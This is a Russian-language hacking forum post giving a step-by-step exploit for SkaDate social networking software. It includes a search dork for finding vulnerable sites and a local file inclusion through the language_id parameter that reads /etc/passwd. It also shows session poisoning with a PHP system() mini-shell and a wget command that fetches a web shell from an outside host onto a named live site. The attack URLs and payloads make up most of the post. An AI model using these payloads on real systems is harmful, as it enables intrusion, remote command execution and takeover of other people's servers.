SkaDate social networking software
Код:
http://com.skadate.com
dork: "SkaDate social networking software" filetype:php
Уязвим параметр language_id=[LFI], запоминается в куках.
/inc/class.language.php
PHP код:
function Language()
{
if( $_GET['language_id'] )
{
$this->curr_lang_id = $_GET['language_id'];
setcookie( 'language_id', $_COOKIE['language_id'], time()-1, PATH_HOME );
setcookie( 'language_id', $_GET['language_id'], time()+2592000, PATH_HOME );
}
elseif( $_COOKIE['language_id'] )
{
$this->curr_lang_id = $_COOKIE['language_id'];
}
else
{
$this->curr_lang_id = getConfig( 'def_lang_id' );
}
Находим инклуд
http://www.exoticity.net/privacy.php?language_id=../../../../../../etc/passwd%00
Смотрим куки, интересует параметр skadate_sessid, видим md5, к примеру 08fc79f504eb70c4c6b769e62831f494.
Ищем сессию в /tmp/.
http://www.exoticity.net/privacy.php?language_id=../../../../../../tmp/sess_08fc79f504eb70c4c6b769e62831f494%00
Если не угадали, находим php.ini и смотрим, куда сохраняется сессия, аналогично инклудим ее.
Теперь сессия запомнилась в куках и инклудится на экран.
Льем минишелл в сессию
http://www.exoticity.net/member/online_list.php?pg=<?if($_GET[pass])system($_GET[pass]);?>
Выполняем команду и льем минишелл для следующей команды
http://www.exoticity.net/member/sign_in.php?pg=<?if($_GET[pass])system($_GET[pass]);?>&pass=ls .. -lia;id
Открываем исходный код странички (форматирование не нарушено), видим наши права в системе, доступные на запись каталоги.
Абсолютный путь тоже виден, льем шелл.
http://www.exoticity.net/member/sign_in.php?pg=<?if($_GET[pass])system($_GET[pass]);?>&&pass=wget http://site/shell.txt -O /home/exoticit/public_html/images/shell.php
=======
Примеры: http://forum.antichat.ru/showpost.php?p=1595768&postcount=990